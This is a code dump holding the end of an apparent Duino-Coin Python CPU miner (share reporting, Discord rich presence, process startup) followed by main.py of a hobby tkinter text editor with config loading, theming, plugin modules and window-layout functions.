+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
# title breaks running as systemd service
if not Service:
title(
getString("duco_python_miner")
+ str(minerVersion)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ algo_back_color
+ Back.YELLOW
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debugOutput("Error while mining: " + str(e))
sleep(5)
break
def prettyPrint(messageType, message, state):
# Print output messages in the DUCO "standard"
# Usb/net/sys background
if messageType.startswith("net"):
background = Back.BLUE
elif messageType.startswith("cpu"):
background = Back.YELLOW
if messageType.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debugOutput("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debugOutput("Rich presence updated")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
if len(sys.argv) > 1 and sys.argv[1] == "-d": Service = True
# Colorama
init(autoreset=True)
# title breaks running as systemd service
if not Service: title(getString("duco_python_miner") + str(minerVersion) + ")")
try:
from multiprocessing import Manager, Process, Value, cpu_count, current_process
manager = Manager()
# Multiprocessing fix for pyinstaller
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 15s.",
"error")
sleep(15)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debugOutput("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ resourcesFolder
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debugOutput("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debugOutput("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debugOutput("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debugOutput("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requestedDiff,
khashcount,
username,
efficiency,
rigIdentifier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
sleep(0.1)
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debugOutput("Error launching CPU thead(s): " + str(e))
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debugOutput("Error launching Discord RPC thead: " + str(e))
|
main.py | import tkinter
from tkinter import ttk
from tkinter import font
from tkinter import filedialog
import math
import re
import json
import subprocess
import requests
try: from bs4 import BeautifulSoup # usually don't get imported when running as root
except Exception: pass
import random
import threading
import sys
import pytz
from importlib import reload as importlib_reload
try: import psutil # usually don't get imported when running as root
except Exception: pass
from highlighter import *
from command_parser import *
from util import *
from inspect import isclass
WINDOW_MARGIN = 0
if (platform == "Windows"):
import ctypes
ctypes.windll.shcore.SetProcessDpiAwareness(True)
elif (platform == "Linux"):
WINDOW_MARGIN = 24 # weird GTK fuckery
CRLF="\r\n"
LF="\n"
class WIN(tkinter.Tk):
# """
# this whole project is very weird and I made a lot of pretty bad decisions,
# but ultimately it's working (at least a bit on Linux anyways)
# It lags a lot on macOS and Windows, because tkinter sucks with a lot of text
# (especially with long lines) and can't process it very well, which makes it lag
# also making a text editor in Python is a very questionable idea on it's own
# it also isn't really optimized in any way at all
# summary: this editor sucks, but I can use it better than other editors so I don't care
# if you use mainly C, C++ check out 4coder (it's going to become free as of 1.7.2021),
# it's a really cool editor
# """
def __init__(self, file=None):
super().__init__()
self.conf = {
"theme": "spacey",
"tab_size": 4,
"orientate": "down",
"backup_files": 0,
"underline_pairs": 0,
"font_size": 12,
"smaller_font_size": 11,
"command_entry_font_size": 11,
"find_entry_font_size": 12,
"command_out_font_size": 11,
"suggest_widget_font_size": 11,
"start_width": 80,
"start_height": 32,
"show_buffer_tab": 1,
"line_end": LF,
"suggest": 1,
"font": "Consolas",
"default_find_mode": "?",
"username": "",
"default_split_mode": "vertical",
"keybinds_file": "keybinds_conf.json",
"themes_file": "theme_conf.json",
"show_speed": False,
"show_temperature": True,
"show_time": True,
"show_line_no": True,
"show_keypress": True,
"show_buffer_name": True,
"highlight_line": False,
"cursor_style": 2,
"allow_external_modules": 1,
"allow_notifications": 1,
"alpha": 100,
"percentage_pos_func": self.get_abs_percentage_pos,
"buffer_border_style": "ridge",
"command_entry_border_style": "ridge",
"command_out_border_style": "ridge",
"find_border_style": "ridge",
"suggest_widget_border_style" : "ridge",
"supress_keybind_warning": 1,
"find_on_key": 1,
"timezone": "GMT-8",
}
self.split_mode_options = {
"nosplit": self.nosplit,
"v": self.split_vertical,
"vertical": self.split_vertical,
"h": self.split_horizontal,
"horizontal": self.split_horizontal,
}
self.theme_options = load_themes(f'{SOURCE_PATH}/{self.conf["themes_file"]}')
self.load_conf()
self.widgets = []
self.found = []
self.found_index = 0
self.fullscreen = False
self.split_mode = "nosplit"
self.subprocesses = []
self.command_history = []
self.run = True
self.font_set()
#configuring main window
# self.wm_attributes("-type", "splash")
self.resizable(True,True)
# self.geometry(f"{self.font.measure(' ')*self.conf['start_width']}x{self.font.metrics('linespace')*self.conf['start_height']}")
self.wm_minsize(20, 0)
self.geometry("1080x720")
self.update_win()
# self.geometry(f"{self.winfo_width()}x{self.winfo_height()}+{self.winfo_x()+self.winfo_width()//2}+{(self.winfo_screenheight()-self.winfo_height())//2}") #CENTERING MAGIC #PROLLY DOESN'T WORK THOUGH
# try: self.iconbitmap("icon.ico")
# except Exception as e: print(e)
try: self.tk.call('wm', 'iconphoto', self._w, tkinter.PhotoImage(file=f"{os.path.dirname(os.path.abspath(__file__))}/icon.png"))
except Exception as e: print(e)
self.canvas = tkinter.Canvas()
self.buffer_tab_frame = tkinter.Frame(self)
self.buffer_frame = tkinter.Frame(self)
self.buffer_render_list = []
self.buffer_render_index = 0
self.buffer_tab_render_list = []
# self.file_handler.buffer_tab.buffer_index or self.buffer.buffer_index is the index for this
self.parser = PARSER(self)
self.file_handler = FILE_HANDLER(self)
# self.video_handler = VIDEO_HANDLER(self)
# self.music_player = MUSIC_PLAYER(self)
self.update_win()
self.l = tkinter.Text(font=self.font, spacing1=0)
for i in range(1000):
self.l.insert("insert", f"{i}\n")
self.l.place(x=-1, y=20, w=0, h=1000)
self.time_label = tkinter.Label()
self.time_label_value = tkinter.StringVar()
self.time_label_value.set("0:0:0")
self.temperature_label = tkinter.Label(text=self.get_rand_temperature())
self.line_no = tkinter.Label()
self.fps_label = tkinter.Label()
self.key_label = tkinter.Label()
self.buffer_name_label = tkinter.Label()
self.buffer = None #file_handler.init functions uses this txt variable so if it's not declared before running the function it's going to break
self.file_handler.init(".scratch") #see handlers.py/FILE_HANDLER
# self.curs = tkinter.Label(self.buffer, bg=self.theme["window"]["fg"])
# self.buffer is only meant to be a pointer to the focused text buffer
# this pointer points to buffer_render_list which is a list of pointers pointing to
# text buffers stored in the file_handler.buffer_list
# self.test_label = tkinter.Label(text="test")
# self.buffer.window_create("1.0", window=self.test_label, stretch=1)
# print(self.buffer.dlineinfo("1.0"))
# see widgets.py
self.find_entry = FIND_ENTRY(self)
self.command_entry = COMMAND_ENTRY(self)
self.command_out = COMMAND_OUT(self)
self.suggest_widget = SUGGEST_WIDGET(self)
self.suggest_widget.configure_self()
self.prompt = BOX(self)
self.load_modules()
self.canvas.configure(bd=0, highlightthickness=0)
self.buffer_tab_frame.configure(relief="ridge", borderwidth=0, highlightthickness=0)
self.buffer_frame.configure(relief="flat", borderwidth=0, highlightthickness=0)
self.time_label.configure(fill=None, anchor="w", justify="left")
self.temperature_label.configure(fill=None, anchor="w")
self.line_no.configure(fill=None, anchor="w", justify="left")
self.fps_label.configure(fill=None, anchor="w", justify="left")
self.key_label.configure(fill=None, anchor="w", justify="left")
self.buffer_name_label.configure(fill=None, anchor="w", justify="left")
self.command_entry.configure_self()
self.find_entry.configure_self()
self.command_out.configure_self()
self.alpha_set(self.conf["alpha"])
bind_keys_from_conf(self)
self.reposition_widgets()
self.theme_load()
self.update_buffer()
self.update_win()
# self.command_out.unplace() # weird fucking bug making the output widget appear for basically no reason
if (len(sys.argv) > 1): [self.file_handler.load_file(filename=os.path.abspath(arg)) for arg in sys.argv[1:]]; self.file_handler.load_buffer(buffer_index=1)
def load_conf(self):
# this is gross, but it works
try: file = open(f"{SOURCE_PATH}/conf", "r"); conf = file.read(); file.close()
except Exception: return
for index, line in enumerate(conf.split("\n"), 1):
if (line and line[0] != "#"): # checks if line isn't empty and if doesn't start with "#" signifying a comment
line = line.split("=") # split the line into two sections
line[0] = line[0].strip() # strip the spaces
line[1] = line[1].strip()
try: self.conf[line[0]] = globals()[line[1]]; continue # try if the second section is a global object
except KeyError: pass
try: self.conf[line[0]] = getattr(self, line[1]); continue # try if the second section is a object in this class
except Exception: pass
try:
if (line[1][0] != "\""): self.conf[line[0]] = int(line[1]) # checks if the second section starts with a double quote (a string) and if it doesn't it signifies an integer
else: self.conf[line[0]] = line[1].strip("\"") # otherwise it's a string (so we strip the excessive double quotes)
except Exception as e: print(f"Error while loading conf file line: {index} \nErorr: {e}")
self.theme = self.theme_options[self.conf["theme"]] # sets the theme
self.alpha_set(self.conf["alpha"]) # sets the alpha
self.conf["timezone"] = pytz.timezone("Etc/"+self.conf["timezone"])
try: self.theme_load() # HACK: tries to load the theme, but the theme_load function errors at startup because the needed object aren't completely initialized
except Exception: pass
def add_module(self, name, _class):
_class = _class(self)
if (hasattr(_class, "importable") and getattr(_class, "importable")):
setattr(self, name, _class)
if (hasattr(_class, "type") and _class.type == "widget"):
self.widgets.append(_class)
else:
del _class
def load_modules(self, dir=None, reload=False):
# who the fuck made python modules so stupid
# java levels of abstraction
if (not self.conf["allow_external_modules"]): return
if (not dir): dir = f"{SOURCE_PATH}/modules" # if the dir is not specified we want to take the path of the source file
else: dir = os.path.dirname(dir) if (not os.path.isdir(dir)) else dir # if the dir is specified we want to check if it's an actual directory and if it's a file we just use the path to the file
print("Loading modules from: ", dir)
if (not os.path.isdir(dir)): print("no modules directory"); return
for file in os.listdir(dir): # iterate through the files in the modules directory
if (os.path.isdir(file)): # recursively loads modules from subdirectories in the modules directory
self.load_modules(dir=os.path.abspath(f"{dir}/{file}"))
if (file[-3:] == ".py"):
file = file[:-3] # take the (.py) extension out of the file name
modules = __import__(f"modules.{file}") # import the "module" from the modules directory
module = modules.__dict__[file] # get the exact file we're looking for
if (reload): importlib_reload(module) # reload the module
for attr in module.__dict__.keys(): # iterate through the attributes of the imported file
c = getattr(module, attr) # get the attribute from the file
if (isclass(c)): # check if there's a class declared in the file
self.add_module(attr, c) # if it's a class we add it to self under the filename
del modules # delete the reduntant stuff
def reload_modules(self, dir=None):
self.load_modules(dir, reload=True)
def theme_make(self):
for buffer in self.buffer_render_list: # because fuck effieciency, right?
if (type(buffer) != TEXT): return # if the buffer isn't a text buffer we don't want to set these
for item in self.theme["highlighter"].items(): # iterate through the theme
if (type(item[1]) == str):
if (item[0][-2:] == "bg"): # if the name ends with bg we want to create a tag that uses the color specified as a background color
buffer.tag_configure(item[0], background=item[1], foreground=self.theme["window"]["bg"], font=buffer.font)
buffer.tag_configure(item[0][:-3], foreground=item[1], font=buffer.font) # but we create a tag with the specified color as the foreground color
self.command_out.tag_configure(item[0], background=item[1], foreground=self.theme["window"]["bg"], font=self.command_out.font) # do the same for the other text widgets
self.command_out.tag_configure(item[0][:-3], foreground=item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0][:-3], foreground=item[1], font=self.suggest_widget.font)
elif (item[0][-2:] == "_b"): # bold
buffer.tag_configure(item[0][:-2], foreground=item[1], font=buffer.font_bold)
self.command_out.tag_configure(item[0][:-2], foreground=item[1], font=self.command_out.font_bold)
self.suggest_widget.tag_configure(item[0][:-2], foreground=item[1], font=self.suggest_widget.font_bold)
else: # normal tag
buffer.tag_configure(item[0], foreground=item[1], font=buffer.font) # , borderwidth=2, relief="groove", bgstipple="gray75"
self.command_out.tag_configure(item[0], foreground=item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0], foreground=item[1], font=self.suggest_widget.font)
else:
try:
item[1]["font"] = self.buffer.font
item[1]["bold"]
item[1]["font"] = self.buffer.font_bold
item[1].pop("bold")
except KeyError: pass
buffer.tag_configure(item[0], **item[1])
item[1].pop("font")
self.command_out.tag_configure(item[0], **item[1], font=self.command_out.font)
self.suggest_widget.tag_configure(item[0], **item[1], font=self.suggest_widget.font)
self.command_entry.tag_configure("command_keywords", foreground=self.theme["highlighter"]["command_keywords"])
self.buffer.tag_raise("cursor")
def theme_set(self, theme=None):
if (type(theme) == list): theme = theme[-1] #failsave switch when selecting multiple themes through the command_out widget
self.theme = self.theme_options[theme]
self.theme_load() # load the theme
self.highlight_chunk() # highlight with new theme
def theme_load(self):
self.theme_make() # create the tags used in text buffers
# configure a whole lot of widgets
self.configure(bg=self.theme["window"]["bg"], cursor=None)
self.canvas.configure(bg=self.theme["window"]["bg"])
self.buffer_tab_frame.configure(bg=self.theme["window"]["bg"])
self.buffer_frame.configure(bg=self.theme["window"]["bg"])
self.time_label.configure(font=self.widget_font, textvariable=self.time_label_value, bg = self.theme["window"]["bg"], fg=self.theme["window"]["widget_fg"])
self.temperature_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.line_no.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.fps_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.key_label.configure(font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.buffer_name_label.configure(text=self.buffer.name, font=self.widget_font, bg = self.theme["window"]["bg"],fg=self.theme["window"]["widget_fg"])
self.command_entry.configure_self()
self.find_entry.configure_self()
self.command_out.configure_self()
self.suggest_widget.configure_self()
self.prompt.configure_self()
for buffer in self.buffer_render_list:
buffer.configure_self()
if (self.conf["show_buffer_tab"]):
[buffer_tab.configure_self() for buffer_tab in self.file_handler.buffer_tab_list]
if (self.file_handler.buffer_tab): self.file_handler.buffer_tab.focus_highlight()
for widget in self.widgets:
widget.configure_self()
self.update_win()
def font_set(self, arg=None, family=None):
if (not family): family=self.conf["font"]
self.font_family = [family, "normal", "bold", "roman"]
self.font = font.Font(family=self.font_family[0], size=self.conf["font_size"], weight=self.font_family[1], slant=self.font_family[3])
self.font_bold = font.Font(family=self.font_family[0], size=self.conf["font_size"], weight="bold", slant=self.font_family[3])
self.smaller_font = font.Font(family=self.font_family[0],size=self.conf["smaller_font_size"], weight=self.font_family[1])
self.smaller_font_bold = font.Font(family=self.font_family[0],size=self.conf["smaller_font_size"], weight="bold")
self.widget_font = font.Font(family=self.font_family[0], size=self.conf["smaller_font_size"], weight=self.font_family[2])
#lazy workaround
try: self.theme_load() # fails on startup
except Exception: pass
def font_set_all(self, arg=None, size=None):
self.conf["font_size"] = size
self.conf["smaller_font_size"] = size - 2
self.font_set()
self.command_out.font_size = size
self.command_out.smaller_font_size = size - 2
self.command_out.font_size_set()
self.find_entry.font_size = size
self.find_entry.smaller_font_size = size - 2
self.find_entry.font_size_set()
self.command_entry.font_size = size
self.command_entry.smaller_font_size = size - 2
self.command_entry.font_size_set()
self.file_handler.buffer_tab.font = self.widget_font
self.file_handler.buffer_tab.configure_self()
for b in self.file_handler.buffer_list:
b[1].font = self.widget_font
b[0].font_size = size
b[0].smaller_font_size = size - 2
b[0].font_size_set()
for b in self.file_handler.buffer_tab_list:
b.font = self.widget_font
for widget in self.widgets:
widget.font = self.widget_font
widget.font_size = self.conf["smaller_font_size"]
widget.configure_self()
try: self.theme_load()
except Exception: pass
def get_color_from_theme(self, color, arg="foreground"):
""" """
res = None
theme=self.theme["highlighter"]
try:
if (type(theme[color]) == dict):
if (type(arg) == str):
res = theme[color][arg]
elif (type(arg) == list):
for a in arg:
res.append(theme[color][a])
elif (type(theme[color]) == str):
res = theme[color]
except KeyError as e: print("error in get_color_from_theme: ", e); self.error(f"{e}")
return res
def alpha_set(self, arg=None):
self.wm_attributes("-alpha", arg/100)
def reposition_widgets(self, arg=None):
btf_bd = self.buffer_tab_frame["bd"]+1 # border width
fs = self.widget_font.metrics("linespace") # font height
buffer_tab_y = fs//1.5+4
txt_y = fs*2
win_width = self.winfo_width()
win_height = self.winfo_height()
if (self.conf["show_buffer_tab"] and len(self.file_handler.buffer_list) > 0): # checks if we can show the buffer tabs in the config and if there are any buffers opened except the scratch buffer
# x = self.file_handler.buffer_tab.winfo_x()
# w = self.file_handler.buffer_tab.winfo_width()
# if (x >= win_width or x + w >= win_width):
# self.buffer_tab_frame.place(x=-x, y=buffer_tab_y+btf_bd, width=win_width+x, height=fs+btf_bd+4, anchor="nw")
# else:
self.buffer_tab_frame.place(x=0, y=buffer_tab_y+btf_bd, width=win_width, height=fs+btf_bd+4, anchor="nw")
self.buffer_frame.place(x=0, y=txt_y+btf_bd, relwidth=1, height=win_height-txt_y-btf_bd, anchor="nw")
else:
self.buffer_frame.place(x=0, y=buffer_tab_y, relwidth=1, height=win_height-buffer_tab_y, anchor="nw")
if (self.command_entry.winfo_viewable()): self.command_entry_place()
if (self.command_out.winfo_viewable()): self.command_out_set(resize=True)
if (self.find_entry.winfo_viewable()): self.find_place(resize=True)
if (self.suggest_widget.winfo_viewable()): self.suggest(resize=True)
if (self.prompt.winfo_viewable()): self.prompt.place_self()
if (self.conf["show_time"]): self.time_label.place(x=self.temperature_label.winfo_x(), y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_temperature"]): self.temperature_label.place(x=self.line_no.winfo_x()-10, y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_line_no"]): self.line_no.place(x=self.winfo_width()-self.line_no.winfo_width()-10, y=0, height=buffer_tab_y, anchor="nw")
if (self.conf["show_speed"]): self.fps_label.place(x=self.time_label.winfo_x()-10, y=0, height=buffer_tab_y, anchor="ne")
if (self.conf["show_keypress"]): self.key_label.place(x=0, y=0, height=buffer_tab_y, anchor="nw")
if (self.conf["show_buffer_name"]): self.buffer_name_label.place(x=self.buffer_frame.winfo_width()//2+self.buffer_name_label.winfo_width()//2, y=0, height=buffer_tab_y, anchor="ne")
x = self.file_handler.buffer_tab.winfo_x()
w = self.file_handler.buffer_tab.winfo_width()
for buffer_tab in self.file_handler.buffer_tab_list:
if (x >= win_width or x + w >= win_width):
if (buffer_tab.buffer_index >= self.buffer.buffer_index):
buffer_tab.reposition()
else:
buffer_tab.unplace()
else:
buffer_tab.reposition()
for widget in self.widgets:
widget.place_self()
self.split_mode_options[self.split_mode]()
def flashy_loading_bar(self, arg=None):
def a():
x = ""
r = 100
for i in range(r):
time.sleep(0.2)
x = "["+chr(9608)*i+"."*(r-i)+"]"
self.notify(x, justify="center")
threading.Thread(target=a, daemon=True).start()
def split(self, arg=None):
self.split_mode = self.conf["default_split_mode"]
try:
self.buffer_render_index += 1
self.file_handler.load_buffer(buffer_index=self.buffer.buffer_index+1)
except IndexError: pass
self.reposition_widgets()
def nosplit(self, arg=None):
self.buffer_render_list[self.buffer_render_index].place(x=0, y=0, relwidth=1, relheight=1)
def split_vertical(self, arg=None):
w = round(1/len(self.buffer_render_list), 3)
for i, buffer in enumerate(self.buffer_render_list, 0):
buffer.place(relx=w*i, y=0, relwidth=w, relheight=1)
def split_horizontal(self, arg=None):
h = round(1/len(self.buffer_render_list), 3)
for i, buffer in enumerate(self.buffer_render_list, 0):
buffer.place(x=0, rely=h*i, relwidth=1, relheight=h)
def win_destroy(self, arg=None) -> str:
# self.file_handler.closing_sequence()
self.run = False
self.quit()
return "break"
def set_fullscreen(self, arg=None):
""" set the window to be fullscreen F11 """
self.fullscreen = not self.fullscreen
self.attributes("-fullscreen", self.fullscreen)
return "break"
def win_minimize(self, arg=None):
self.wm_state("iconic")
return "break"
def set_dimensions(self, arg=None, expand=True): # I do understand that this is a terrible, hideous thing but I couldn't come up with a better solution
""" changes window size accordingly to keys pressed Alt-Curses """
key = arg.keysym
x, y = self.winfo_x(), self.winfo_y()
if (expand):
margin = 20
if (key == "Right"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x}+{y-WINDOW_MARGIN}")
elif (key == "Left"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x-margin}+{y-WINDOW_MARGIN}")
elif (key == "Up"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN-margin}")
elif (key == "Down"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN}")
elif (not expand):
margin = -20
if (key == "Right"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x-margin}+{y-WINDOW_MARGIN}")
if (key == "Left"):
self.geometry(f"{self.winfo_width()+margin}x{self.winfo_height()}+{x}+{y-WINDOW_MARGIN}")
if (key == "Up"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-WINDOW_MARGIN}")
if (key == "Down"):
self.geometry(f"{self.winfo_width()}x{self.winfo_height()+margin}+{x}+{y-margin-WINDOW_MARGIN}")
return "break"
def win_expand(self, arg=None):
self.set_dimensions(arg)
return "break"
def win_shrink(self, arg=None):
self.set_dimensions(arg, expand=False)
return "break"
def suggest(self, arg=None, resize=False):
token = self.buffer.current_token.strip()
if (not resize):
if (re.match(r"[a-zA-Z_]+([0-9])*", token)):
self.suggest_widget.delete("1.0", "end")
longest_line = 0
ret = ""
for m in self.buffer.highlighter.vars + self.buffer.lexer.vars:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
if (len(m) > longest_line): longest_line = len(m)
for m in self.buffer.highlighter.funcs + self.buffer.lexer.functions:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
self.suggest_widget.tag_add("functions", "insert -1l linestart", "insert -1l lineend")
if (len(m) > longest_line): longest_line = len(m)
for m in self.buffer.highlighter.keywords + self.buffer.highlighter.logical_keywords + self.buffer.highlighter.numerical_keywords:
if (re.match(token, m)):
self.suggest_widget.insert("insert", m+"\n")
self.suggest_widget.tag_add("keywords", "insert -1l linestart", "insert -1l lineend")
if (len(m) > longest_line): longest_line = len(m)
self.suggest_widget.delete("end-1c")
self.suggest_widget.mark_set("insert", "1.0")
c = list(self.buffer.bbox("insert"))
out_len = len(self.suggest_widget.get("1.0", "end").split("\n"))
if (out_len <= 0):
self.buffer.mode_set(mode="normal", force=True)
self.buffer.focus_set()
return
self.buffer.mode_set(mode="suggest", force=True)
self.suggest_widget.tkraise()
if (out_len >= 15):
h = 15*self.buffer.font.metrics("linespace")
else:
h = out_len*self.buffer.font.metrics("linespace")
if (c[1]+h > self.winfo_height()): c[1] = self.winfo_height() - h - 100
self.suggest_widget.place(x=c[0]+30, y=c[1], width=longest_line*self.buffer.font_size, height=h, anchor="nw")
elif (len(self.suggest_widget.get("1.0", "end-2c").split("\n")) > 1):
c = list(self.buffer.bbox("insert"))
self.suggest_widget.place(x=c[0]+30, y=c[1])
self.buffer.focus_set()
def nt_place(self, arg=None): # why nt???
self.command_out.change_ex(self.command_out.file_explorer)
arg, tags = self.file_handler.highlight_ls()
self.command_out_set(arg=arg, tags=tags, append_history=False)
def popup(self, arg=None):
""" gets x, y position of mouse click and places a menu accordingly """
self.right_click_menu.tk_popup(arg.x_root+5, arg.y_root)
def command_entry_place(self, arg=None):
""" Shows command entry widget """
h = self.command_entry.font.metrics("linespace") + (self.command_entry["pady"]+self.command_entry["bd"])*2
y = self.buffer_frame.winfo_height()
# if (self.command_entry["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]; y -= self.buffer["bd"]
# else: x = 0; w = 0
# if (self.command_entry["relief"] == "flat"): y -= self.buffer["bd"]
x = 0; w = 0
if (self.conf["orientate"] == "down"): self.command_entry.place(x=x, y=y-h, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
elif (self.conf["orientate"] == "up"): self.command_entry.place(x=-1, y=0, width=self.buffer_frame.winfo_width()-w, height=h, anchor="nw")
self.command_out.place_forget()
self.command_entry.tkraise(); self.command_entry.focus_set()
return "break"
def find_place(self, arg=None, text=None, resize=False):
if (not resize):
self.find_entry.start_index = self.buffer.index("insert")
self.find_entry.find_mode_set(text=text)
self.find_entry.tkraise(); self.find_entry.focus_set()
h = self.find_entry.font.metrics("linespace") + (self.find_entry["pady"]+self.find_entry["bd"])*2
# if (self.find_entry["relief"] == "flat"): x = self.buffer["bd"]; w = self.buffer["bd"]
# else: x = 0; w = 0
x = 0; w = 0
self.find_entry.place(x=x, y=self.buffer_frame.winfo_height()-h-40, width=self.buffer_frame.winfo_width()-w*2, height=h, anchor="nw")
return "break"
def find_place_with_token(self, arg=None):
self.find_place(text=self.buffer.current_token)
return "break"
def command_out_set(self, arg=None, tags=None, resize=False, focus=False, justify="left", append_history=True):
# honestly this is a really shitty function, but it works somehow, so you shouldn't question it, if you poke around with it it's most probably going to break
""" sets the text in command output """
if (resize and self.command_out.arg == None):
return
elif (not resize):
if (focus):
